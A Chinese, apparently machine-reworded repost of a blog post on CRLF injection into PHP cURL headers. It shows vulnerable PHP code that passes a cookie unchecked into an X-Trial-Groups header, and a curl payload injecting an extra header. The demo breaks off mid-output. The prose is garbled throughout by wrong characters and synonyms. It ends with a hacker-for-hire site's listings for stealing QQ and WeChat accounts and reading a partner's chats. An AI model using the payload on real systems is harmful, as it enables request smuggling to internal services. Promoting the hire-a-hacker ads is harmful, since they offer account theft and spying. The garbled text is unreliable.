将CRLF注入到PHP的cURL选项中
这是一篇关于将回车符和换行符注入调用内部 API的帖子。一年前我在GitHub上写了这篇文章的关键,但GitHub不是特别合适发布博客文章。你现在所看到的这 篇文章我添加了更多细节,所以它不是是直接复制粘贴的。
我喜爱做白盒测验。我不是一个优异的黑盒测验人员,但我花了十多年的时刻阅览和写PHP代码 – 而且在此过程中犯了许多过错 – 所以我知道要留意些什么。
我阅读了一些源代码发现了一个和这个有点像的函数:
// common.php
function getTrialGroups(){
$trialGroups = 'default';
if (isset($_COOKIE['trialGroups'])){
$trialGroups = $_COOKIE['trialGroups'];
}
return explode(",", $trialGroups);
}
我所看到的体系都有一个“Trial Groups”的概念。 每个用户会话都有一个与之相关的组,在cookie中以逗号分隔的列表存储。 我的主意是,当推出新功用时,能够首先为少量客户启用这些功用,以下降功用发动的危险,或许答应对特性的不同变体进行比较(这种办法称为A /B测验)。 getTrialGroups()函数仅仅读取cookie值,将列表拆开并为用户回来一组 trial groups。
此功用中短少白名单当即引起了我的留意。 我查找了其余部分的代码库来找调用函数的详细位置,这样我就能够看到对其回来值是否有任何不安全的运用。
我不能和你们共享详细的代码,但我把我的发现大致的写了下来:
// server.php
// Include common functions
require __DIR__.'/common.php';
// Using the awesome httpbin.org here to just reflect
// our whole request back at us as *** ON ?
$ch = curl_init("http://httpbin.org/post");
// Make curl_exec return the response body
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Set the content type and pass through any trial groups
curl_setopt($ch, CURLOPT_HTTPHEADER, [
"Content-Type: application/json",
"X-Trial-Groups: " . implode(",", getTrialGroups())
]);
// Call the 'getPublicData' RPC method on the internal API
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([
"method" => "getPublicData",
"params" => []
]));
// Return the response to the user
echo curl_exec($ch);
curl_close($ch);
此代码运用cURL库在内部 *** ON API上调用getPublicData办法。 该API需求了解用户的trial groups,以便相应地更改其行为,所以trial groups 会在X-Trial-Groups标头中传递给API。
问题是,在设置CURLOPT_HTTPHEADER时不会查看回车符或换行符字符的值。 由于getTrialGroups()函数回来用户可控数据,因而能够将恣意头部注入到API恳求中。
演示
为了让咱们更简单的了解,我将运用PHP的内置Web服务器在本地运转server.php:
tom@slim:~/tmp/crlf php -S localhost:1234 server.php
PHP 7.2.7-0ubuntu0.18.04.2 Development Server started at Sun Jul 29 14:15:14 2019
Listening on http://localhost:1234
Document root is /home/tom/tmp/crlf
Press Ctrl-C to quit.
运用cURL命令行实用程序,咱们能够发送包括trialGroups cookie的示例恳求:
tom@slim:~ curl -s localhost:1234 -b 'trialGroups=A1,B2'
{
"args": {},
"data": "{"method":"getPublicData","params":[]}",
"files": {},
"form": {},
"headers": {
"Accept": "*/*",
"Connection": "close",
"Content-Length": "38",
"Content-Type": "application/json",
"Host": "httpbin.org",
"X-Trial-Groups": "A1,B2"
},
"json": {
"method": "getPublicData",
"params": []
},
"origin": "X.X.X.X",
"url": "http://httpbin.org/post"
}
我运用http://httpbin.org/post替代内部API端点,它回来一个 *** ON文档,描述发送的POST恳求,文档中包括恳求中的一切POST数据和标头。
有关呼应一个需求向咱们提一下的事项是发送到httpbin.org的X-Trial-Groups标头包括trialGroups cookie中的A1,B2字符串。 然后现在试一下一些CRLF(回车换行)注入:
tom@slim:~ curl -s localhost:1234 -b 'trialGroups=A1,B2%0d%0aX-Injected:%20true'
{
"args": {},
"data": "{"method":"getPublicData","params":[]}",
"files": {},
"form": {},
"headers": {
"Accept": "*/*",
"Connection": "close",
"Content-Length": "38",
"Content-Type": "application/json",
[1] [2] [3] 黑客接单网
相关文章
一手数据,找黑客改网投单,找黑客黑别人电脑要多少钱
AS varchar(8000)),1,1)),0)>97125.76.227.70 windows/foreign/reverse_tcpGoogle搜索要害字 “关于本站 – 网站协助...
学新网_男朋友找黑客看我聊天记录-网上找黑客安全吗
「学新网_男朋友找黑客看我聊天记录-网上找黑客安全吗」原理:sslstrip+ettercap进行数据包的截获解码器,进行手动履行或对应用程序数据者智能解码编码的东西;上面的代码,在榜首行没有过滤或转...
黑客接单盗QQ号_黑客qq号码找号码的
2.U盘蠕虫有本文以Powershell行为日志审计为切入点, 翻开介绍AMSI的功用,作业机制与现有绕过办法。 3.1 东南亚区域黑客接单盗QQ号,黑客qq号码找号码的 Cryptojacking实...
闫盼盼_在哪里找黑客-去哪里找黑客盗微信号
255 heads, 63 sectors/track, 8354 cylinders SYN Stealth Scan Timing: About 22.52% done; ETC: 11:0...
朋友向我借钱说生意周转困难,结果是拿去赌博,有
· Windows 7;Breakpoint 1 at 0x466af2: file ../../../../../source/t2cstr/t2cstr.c, line 1057.黑客开始大规模扫...
黑客是如何利用谷歌进行信息查找的
微软再次发布对于CVE-2019-0708漏洞做修补的提醒,基于漏洞的严重性强烈建议用户尽快升级修复首先根据cve的信息,确定漏洞1.7.6和1.8.0-rc3上修复结合着反汇编代码看,效果可能更好影...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!